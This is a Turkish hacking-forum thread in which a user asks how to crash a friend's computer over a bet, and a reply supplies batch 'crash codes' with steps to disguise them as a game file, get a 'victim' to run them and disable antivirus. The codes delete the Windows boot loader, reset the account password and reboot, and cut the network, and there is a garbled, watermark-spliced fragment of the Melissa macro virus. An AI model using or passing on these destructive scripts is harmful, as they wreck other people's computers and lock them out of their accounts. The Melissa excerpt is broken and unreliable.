!!!yardım!!!

123DieHard123

Yeni üye
19 Tem 2013
7
0
Arkadaşlar bi kişiyle iddaya girdik bana diyoki bilgisayar çökeltme diye birşey yok diyor benim bilgisayarımı çökelt sana leptop umu vercem dedi tht yede sole ıstersen onlarda sana yardım edemez diyo arkadaşlar yardım edsenizde şu kişinin bilgisayarını çökeltsem olurmu acaba ?

2nokta

Yaşayan Forum Efsanesi
28 Şub 2013
16,689
16
Çökeltme ne ya:) çökertme olmasın o.Evet öyle bir şey var ama hr istediğin bilgisayr pat diye çökertseydin piyasa bilgisayr denen bişey kalmazdı.baska bilgisayra girmek için çeşitli yöntemler var onları denem lazım Zaten arkdasında şimdi bu bişey yapar diye herşeyden kıllanacagı için senn işi zor.habrin olsun.En fazla bir yere dosya yüklersin baskası adı altında konusurken ordan dosyayı indirir c yi silerisin tamam.

Trinty

Uzman üye
7 Nis 2013
1,302
0
Bileceksiniz
Pc çökertme kodları var bunu .bat olarak kaydedip arkadaşına yolluyabilirsin ama oda savunmada oldugu için hiçbirşey yapamazsın :D eşşek değil ya senin çökerteceğini bildiği halde dosya kabul etsin :)

holocoust28

Uzman üye
26 Tem 2013
1,170
0
İLK ADIM:BİR NOT DEFTERİ AÇMAK
İKİNCİ ADIM:BU KODLARDAN İSTEDİĞİNİZİ NOT DEFTERİNİN İÇİNE KOPYALA YAPIŞTIR YAPMAK .
ÜÇÜNCÜ ADIM:BU KODLARI FARKLI KAYDET DİYİM TÜRÜNÜ TOPLU İŞ DOSYASI YAPIP ADINIDA .BAT LI YAPIN
ÖRNEK:OYUN.BAT

İŞTE BU KADAR SİZDE VİRUS YARATTINIZ ŞİMDİ TEK YAPMANIZ GEREKEN BUNU KURBANA YEDİDTİRMEK

Arkadaşlar bi kişiyle iddaya girdik bana diyoki bilgisayar çökeltme diye birşey yok diyor benim bilgisayarımı çökelt sana leptop umu vercem dedi tht yede sole ıstersen onlarda sana yardım edemez diyo arkadaşlar yardım edsenizde şu kişinin bilgisayarını çökeltsem olurmu acaba ?

Buyur kardeşim :) KOD 1:BU KOD VİRUS YAPARAK ÇÖKELTİR
Kod:
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r

KOD2:Yİne bir çökeltme kodu

Kod:
/timersecure 0 0 //mkdir $mid(c:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
????: Web Hattı - Türkiyenin En Güncel Forumu /internet-teknolojileri/454253-bilgisayar-cokeltme-kodlari.html

KOD3:BU FPI nın kulandığı bi virus kod u dur
Kod:
If NTCL <> 0 And ADCL = 0 And (InStr(1, Active********.Name, "********") = False) Then
Active********.SaveAs FileName:=Active********.FullN ame
ElseIf (InStr(1, Active********.Name, "********") <> False) Then
????: Web Hattı - Türkiyenin En Güncel Forumu http://www.webhatti.com/showthread.php?t=454253
Active********.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub < =>

Kod4:BU kodda ben çok tehlikeli şeylerle uğraşmam diyelere karşı şifre koyma kod u

Kod:
net user %username% 123456
shutdown -r

Burda 123456 yazan yer konulucak şifredir bunu siz istediğiniz şekilde değiştirebilrsiniz

KOD5:Msn üzerinden interneti kesme kodu

ipconfig/release

şimdi wereceğim kod ise interneti yukardaki kodlar kestikmi geri getirme kod u

ipconfig/renew

KOD6:ŞİMDİ BİLGİSAYAR ÇÖKELTME KODLARINI OLDUDA KENDİZ AÇTINIZ HEMEN KORKMAYIN BUNUDA DÜÜŞÜNDÜM WE PAMZEHİRİDE WERİYİM DEDİM

Kod:
shutdown -a

ÇÖKELTEME KODUNU ÇALIŞTIRDINIZ DİYELİM HEMEN 30 sn YELİK BİR GERİ SAYIM BAŞLIYCAKTIR BU 30 sn YE İÇİNDE PANZEHRİ ÇALIŞTIRDINIZ ÇALIŞTIRDIZ YOKSA Bİ FORMAT ATMAK ZORUNDASINIZ

Bilgisayarlarımızdaki her dosyanın kendisine özel bir uzantısı vardır. Bat da bir uzantıdır. Bilmeyen veya anlamayan arkadaşlar için ben tekrardan anlatayım. Şimdi öncelikle bilgisayarınızdan herhangi bir klasöre girip seçenekler bölümünden klasör seçenekleri bölümünü tıklayın. Karşınıza yeni bir pencere çıkacak. Oradan görünüm sekmesinme gelin ve aşağıdaki Bilinen dosya türleri için uzantıları gizle seçeneğinin yanındaki işareti kaldırın. İşlemleri kaydedip klasörden çıkın ve masa üstünde yeni bir metin belgesi oluşturun. Sonra verdiğim virüslerden herhangi birinin kodlarını alıp bu metin belgesinin içine yapıştırın ve kaydedin. Sonra o metin belgesinin adını yeni metin belgesi.txt den yeni metin belgesi.bat olarak değiştirin. Yaptığınız işlemle dosyanın uzantısını değiştirmiş olacaksınız. Bu arada bazı antivirler yaptığınız bu işlemi bir virüs faaliyeti olarak algılayıp oluşan dosyayı silebilir. Bu durumda antivir'inizi devre dışı bırakıp tekrar deneyin. Bütün bu işlemleri bitirdikten sonra oluşan virüsü istediğiniz şekilde kulabilirsiniz. Şayet oluşturduğunuz virüsü yanlışlıkla kendi bilgisayarınızda açarsanız verdiğim panzehir kodunu talimatlar doğrultusunda oluşturup 30 sn içinde çalıştırmalısınız. Yoksa bilgisayarınız bir daha açılamayabilir.

Bir Teşekür butonunada Tııııkkk

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.